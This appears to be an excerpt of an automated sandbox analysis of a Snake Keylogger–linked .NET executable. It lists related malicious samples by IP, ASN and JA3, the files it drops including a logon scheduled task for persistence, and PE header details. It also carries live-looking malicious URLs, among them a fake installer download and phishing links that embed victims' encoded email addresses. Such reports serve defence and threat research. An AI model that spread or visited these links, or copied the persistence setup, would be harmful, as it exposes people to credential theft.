	TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	rREQUESTFORQUOTE-INQUIRY87278.exe	Get hash	malicious	MassLogger RAT, Snake Keylogger, VIP Keylogger	Browse	193.122.130.0
	SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	132.226.247.73
	8038.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.8.169

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	Bn7LPdQA1s.exe	Get hash	malicious	LummaC, Vidar	Browse	149.154.167.99
	WiTqtf1aiE.exe	Get hash	malicious	LummaC, Vidar	Browse	149.154.167.99
	down.exe	Get hash	malicious	Unknown	Browse	149.154.167.99
	wrong bank details.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	z1PO7311145.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	PO.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	rREQUESTFORQUOTE-INQUIRY87278.exe	Get hash	malicious	MassLogger RAT, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	Yeni Sipari#U015f.pdf.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
CLOUDFLARENETUS	SecuriteInfo.com.Win32.PWSX-gen.27846.23954.exe	Get hash	malicious	LummaC	Browse	104.21.53.8
	lihZ6gUU7V.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	104.21.53.8
	Bn7LPdQA1s.exe	Get hash	malicious	LummaC, Vidar	Browse	172.67.206.204
	https://www.dropbox.com/scl/fi/qo6796ed7hlrt0v8k9nr6/Patagonia-Health-Barcode-Scanner-Setup-2024.exe?rlkey=5bmndvx8124ztopqewiogbnlt&st=yvxpokhf&dl=0	Get hash	malicious	Unknown	Browse	1.1.1.1
	https://dsdhie.org/dsjhem	Get hash	malicious	Unknown	Browse	188.114.96.3
	L-tron_Payroll.docx	Get hash	malicious	Unknown	Browse	104.17.25.14
	SecuriteInfo.com.Win32.PWSX-gen.19404.14810.exe	Get hash	malicious	LummaC	Browse	172.67.206.204
	https://communications-chamber-confidentiality-limitation.trycloudflare.com/spec/#bWNhcnR3cmlnaHRAY2hlbXVuZ2NhbmFsLmNvbQ==	Get hash	malicious	Unknown	Browse	104.16.231.132
	+18365366724753456-83736-10244688.html	Get hash	malicious	HTMLPhisher	Browse	188.114.96.3
	https://url.avanan.click/v2/r01/___https://www.tiktok.com/qnspdA7?fni=6cbb&qfsl=js&xhjsj=gnt_zwq&yfwljy=myyux:ddBBB.lttlqj.hfdzwq?v=frudxdkniljyAkC.sEd.frl___.YXAzOnNvdXRoZXJua2l0Y2hlbmFuZGdyaWxsOmE6bzo2MGY0ZmI3MTkzODQ4OWRiOGFlZjY2ODI4ODlkMDk3NDo3OmRlYjY6NjI5YzkxZjFmNmQ3ZjI1NWIxN2UwYTI5ZTNmZjcyMTQyNTg3NmZhMDQyOWZlMDI4MDhmODRlNWVhYWU3MjJhZDpoOlQ6VA#ZHN5aHJlQG9sZ29vbmlrLmNvbQ==	Get hash	malicious	Unknown	Browse	172.66.0.235
CLOUDFLARENETUS	SecuriteInfo.com.Win32.PWSX-gen.27846.23954.exe	Get hash	malicious	LummaC	Browse	104.21.53.8
	lihZ6gUU7V.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	104.21.53.8
	Bn7LPdQA1s.exe	Get hash	malicious	LummaC, Vidar	Browse	172.67.206.204
	https://www.dropbox.com/scl/fi/qo6796ed7hlrt0v8k9nr6/Patagonia-Health-Barcode-Scanner-Setup-2024.exe?rlkey=5bmndvx8124ztopqewiogbnlt&st=yvxpokhf&dl=0	Get hash	malicious	Unknown	Browse	1.1.1.1
	https://dsdhie.org/dsjhem	Get hash	malicious	Unknown	Browse	188.114.96.3
	L-tron_Payroll.docx	Get hash	malicious	Unknown	Browse	104.17.25.14
	SecuriteInfo.com.Win32.PWSX-gen.19404.14810.exe	Get hash	malicious	LummaC	Browse	172.67.206.204
	https://communications-chamber-confidentiality-limitation.trycloudflare.com/spec/#bWNhcnR3cmlnaHRAY2hlbXVuZ2NhbmFsLmNvbQ==	Get hash	malicious	Unknown	Browse	104.16.231.132
	+18365366724753456-83736-10244688.html	Get hash	malicious	HTMLPhisher	Browse	188.114.96.3
	https://url.avanan.click/v2/r01/___https://www.tiktok.com/qnspdA7?fni=6cbb&qfsl=js&xhjsj=gnt_zwq&yfwljy=myyux:ddBBB.lttlqj.hfdzwq?v=frudxdkniljyAkC.sEd.frl___.YXAzOnNvdXRoZXJua2l0Y2hlbmFuZGdyaWxsOmE6bzo2MGY0ZmI3MTkzODQ4OWRiOGFlZjY2ODI4ODlkMDk3NDo3OmRlYjY6NjI5YzkxZjFmNmQ3ZjI1NWIxN2UwYTI5ZTNmZjcyMTQyNTg3NmZhMDQyOWZlMDI4MDhmODRlNWVhYWU3MjJhZDpoOlQ6VA#ZHN5aHJlQG9sZ29vbmlrLmNvbQ==	Get hash	malicious	Unknown	Browse	172.66.0.235
UTMEMUS	ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	wrong bank details.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.8.169
	PO.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
	TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	132.226.247.73
	8038.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.8.169
	COMPANY PROFILE_pdf.exe	Get hash	malicious	DarkTortilla, Snake Keylogger	Browse	132.226.8.169
	Quotation.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	2i3Lj7a8Gk.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	VX7fQ2wEzC.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	https://s.craft.me/yB5midhwwaHUPW	Get hash	malicious	HTMLPhisher	Browse	188.114.97.3
	Justificante de pago.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	RFQ Ref. No CRCCRFQHAFJIHDG2-KSU001 REV.01..exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	wrong bank details.exe	Get hash	malicious	MassLogger RAT	Browse	188.114.97.3
	z1PO7311145.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	rREQUESTFORQUOTE-INQUIRY87278.exe	Get hash	malicious	MassLogger RAT, Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.97.3
	8038.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
3b5074b1b5d032e5620f69f9f700ff0e	file.exe	Get hash	malicious	Credential Flusher	Browse	149.154.167.220
	T6l6gPxwQU.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	https://mailstat.us/tr/t/5w8u1qwlwl61e4h/1/https:/krediti.ca/#Y2FyYS5jJGNiZmxvb3JzaW5jLmNvbQ==	Get hash	malicious	Outlook Phishing, HTMLPhisher	Browse	149.154.167.220
	https://url.avanan.click/v2/r01/___https://www.tiktok.com/qnspdA7?fni=6cbb&qfsl=js&xhjsj=gnt_zwq&yfwljy=myyux:ddBBB.lttlqj.hfdzwq?v=frudxdkniljyAkC.sEd.frl___.YXAzOnNvdXRoZXJua2l0Y2hlbmFuZGdyaWxsOmE6bzo2MGY0ZmI3MTkzODQ4OWRiOGFlZjY2ODI4ODlkMDk3NDo3OmRlYjY6NjI5YzkxZjFmNmQ3ZjI1NWIxN2UwYTI5ZTNmZjcyMTQyNTg3NmZhMDQyOWZlMDI4MDhmODRlNWVhYWU3MjJhZDpoOlQ6VA#ZHN5aHJlQG9sZ29vbmlrLmNvbQ==	Get hash	malicious	Unknown	Browse	149.154.167.220
	SecuriteInfo.com.Win64.TrojanX-gen.22573.8055.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	Ref#0503711.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	scan_374783.js	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	file.exe	Get hash	malicious	Credential Flusher	Browse	149.154.167.220
	shipping.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	https://future.nhs.uk	Get hash	malicious	Unknown	Browse	149.154.167.220

Process:	C:\Users\user\Desktop\EUYIlr7uUX.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	true
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\qggKEJlcsFa.exe.log

Download File

Process:	C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	false
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	2232
Entropy (8bit):	5.380747059108785
Encrypted:	false
SSDEEP:	48:lylWSU4xymI4RfoUeW+gZ9tK8NPZHUxL7u1iMugei/ZPUyus:lGLHxvIIwLgZ2KRHWLOugss
MD5:	6557859169C38B3271B0895BF83DB40D
SHA1:	E5D44C6EBB6ABEA6A2E26FE81605C7BF8F903843
SHA-256:	547BADA37C7E136DFB5EA88928F9BFAF56C50DF2BB1E46628EACB8D1E7CDFD93
SHA-512:	CCC9D1D601F0F15453ED0EB7B7AEAB3B9B56C048E485E351CBF33FEF2306837019AB5206ED4D84873A35529FB9721BC1B9A222B7EC7EA7EC9DE58831D99EA730
Malicious:	false
Preview:	@...e.................................^..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...\|...........System.Configuration4.................%...K... ...........System.Xml..L.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hhpaxbo5.e4a.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mbibglpb.523.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_o4w1kc0h.slr.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_x03er4si.pg3.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\tmp16F6.tmp

Download File

Process:	C:\Users\user\Desktop\EUYIlr7uUX.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1584
Entropy (8bit):	5.116145533377193
Encrypted:	false
SSDEEP:	24:2di4+S2qhtJ12iy1mcrUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtx5xvn:cgeLAYrFdOFzOzN33ODOiDdKrsuTxvv
MD5:	C1BEECC39F1B780ADF94453B81FDCD0F
SHA1:	1C429C51F31F7791AFE9F54925DDB2278AF4C778
SHA-256:	FC5AEC50C1A75B58D4C8A14B54906AB177DD71E46D825ADFB0B44B720D5E03EC
SHA-512:	F2F64FD77DE0B51A062CE18B3029F1E02B1BADF7A1C1E17FEF91A2CAF82355E786194ACCE4243C3B0EC10B54E5F19F73FC94D60D62F56DA1ABF46AE4E8B3A27F
Malicious:	true
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor

C:\Users\user\AppData\Local\Temp\tmp2369.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1584
Entropy (8bit):	5.116145533377193
Encrypted:	false
SSDEEP:	24:2di4+S2qhtJ12iy1mcrUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtx5xvn:cgeLAYrFdOFzOzN33ODOiDdKrsuTxvv
MD5:	C1BEECC39F1B780ADF94453B81FDCD0F
SHA1:	1C429C51F31F7791AFE9F54925DDB2278AF4C778
SHA-256:	FC5AEC50C1A75B58D4C8A14B54906AB177DD71E46D825ADFB0B44B720D5E03EC
SHA-512:	F2F64FD77DE0B51A062CE18B3029F1E02B1BADF7A1C1E17FEF91A2CAF82355E786194ACCE4243C3B0EC10B54E5F19F73FC94D60D62F56DA1ABF46AE4E8B3A27F
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor

C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe

Download File

Process:	C:\Users\user\Desktop\EUYIlr7uUX.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	765440
Entropy (8bit):	7.902134309329896
Encrypted:	false
SSDEEP:	12288:Tym5mU+8zgPAUVuRvrQ0hUnfwfwWh6G1X+aOnRteZS+cqKbCiVlG:umx0PwrQ0h2YfhhH13ibeef1l
MD5:	A3939099773CDA5B2C94A6F1061FFA19
SHA1:	004C511AFA2852FD94ACA2253C6978739BEA715D
SHA-256:	178EBC7A9FB6E2A0B5C0DA522572F14FF56FA50E60507D552940256DBE596645
SHA-512:	2AE0058169229A960220ADDB2B430CAC8B2DBC0B1B007DE72E6A098702D2819310444D70A4F088583ABA14F43E5BD2FE0823CB75B4039ECAB83432286BD5AFA6
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 21%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g..............0.............:.... ........@.. ....................................@....................................O.......@............................................................................ ............... ..H............text...@.... ...................... ..`.rsrc...@...........................@..@.reloc..............................@..B........................H.......................f.. M............................................r...p}.....r...p}......}.....(%......(...........0...........(......s7....sA....sC.....{......s....s)...o&.....s....%..js....o.....%r!..po.....%.o.....oB.....s....%..js....o.....%r-..po.....oB.....s....%..js....o.....%..s'...(....o.....%rA..po.....oB......0...........rY..p..sd.....oe......+....0..]..........((...r...p().....(.....,,.(+....r...p(,....rl..p(,....(+......(-......sp.....ok......+..".(

C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\EUYIlr7uUX.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.902134309329896
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.80% Win32 Executable (generic) a (10002005/4) 49.75% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Windows Screen Saver (13104/52) 0.07% Generic Win/DOS Executable (2004/3) 0.01%
File name:	EUYIlr7uUX.exe
File size:	765'440 bytes
MD5:	a3939099773cda5b2c94a6f1061ffa19
SHA1:	004c511afa2852fd94aca2253c6978739bea715d
SHA256:	178ebc7a9fb6e2a0b5c0da522572f14ff56fa50e60507d552940256dbe596645
SHA512:	2ae0058169229a960220addb2b430cac8b2dbc0b1b007de72e6a098702d2819310444d70a4f088583aba14f43e5bd2fe0823cb75b4039ecab83432286bd5afa6
SSDEEP:	12288:Tym5mU+8zgPAUVuRvrQ0hUnfwfwWh6G1X+aOnRteZS+cqKbCiVlG:umx0PwrQ0h2YfhhH13ibeef1l
TLSH:	70F4128122E85B21D2BE0FFD24B0924407B3B9566536EF0E5F9DA0CA2F73B414D21B67
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g..............0.............:.... ........@.. ....................................@................................

File Icon


Icon Hash:	71f06930924d0f0f

Static PE Info

General

Entrypoint:	0x4bb43a
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x6704151C [Mon Oct 7 17:06:36 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xbb3e8	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xbc000	0x1340	.rsrc
